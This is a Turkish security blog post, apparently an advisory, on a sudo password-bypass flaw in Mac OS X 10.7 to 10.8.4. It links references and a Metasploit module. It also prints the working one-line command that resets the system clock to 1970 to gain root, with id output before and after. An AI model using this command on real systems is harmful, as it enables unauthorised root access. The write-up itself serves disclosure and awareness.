MAC OS X Sistemlerde Yetki Yükseltme Açıklığı

Bir Unix bileşeni olarak bilinen ‘sudo’ uygulamasına ait Parola korumasını bypass eden bir güvenlik açıklığı yayımlanmıştı Mart ayında. Detaylar için bakınız http://www.sudo.ws/sudo/alerts/epoch_ticket.html.

sudo, root haklarıyla uygulama çalışmak için kullanılmaktadır ve çalıştırıldığı zaman parola istemektedir.

Mac OS X sistemler içinde saati 1 Ocak 1970 tarihine geri alarak ‘sudo’ ile  root haklarına parolasız ulaşabileceğiniz bir güvenlik açığı hali hazırda mevcut.

Yerel yetki yükseltme olarak bilinen bu açıklıkdan, 10.7 sürümünden şuan güncel olarak kullanılan 10.8.4 sürümüne kadar tüm Mac OS X sistemlerin etkilendiği rapor edilmiştir.

Metasploit ekibi tarafından açıklığı sömürecek modül yayımlandı, aşağıdaki kaynaklardan detay bilgi edinebilirsiniz.
http://packetstormsecurity.com/files/122965
http://www.rapid7.com/db/modules/exploit/osx/local/sudo_password_bypass

Bu açıklıkdan başarıyla faydalanan saldırgan, sisteminizde root yetkileri ile uzakdan kod/komut çalıştırabilir, Rootkit kurabilir.

Açıklığım Sömürülmesi


Kısıtlı kullanıcı haklarına sahibiz

ozanus:~ ozanucar$ id
uid=501(ozanucar) gid=20(staff) groups=20(staff),502(access_bpf),12(everyone),33(_appstore),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),100(_lpoperator),204(_developer),401(com.apple.access_screensharing)

root yetkilerine yükselmek için aşağıdaki komutu çalıştırmanız yeterli

ozanus:~ ozanucar$ sudo -k;systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su
setUsingNetworkTime: Off
Set TimeZone: GMT
setdate: 01/01/1970
Set Time: 00:00:00

Komut çalıştıkdan sonra tekrar yetkilerinizi sorgularsanız, sorgusuz sualsiz root haklarına kavuştuğunuzu görmüş olucaksınız

sh-3.2# id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),33(_appstore),61(localaccounts),80(admin),98(_lpadmin),100(_lpoperator),204(_developer),401(com.apple.access_screensharing)

Henüz Mac OS X için yayımlanmış bir güncelleme mevcut değil.

Yazar: Ozan UÇAR
ozan.ucar@bga.com.tr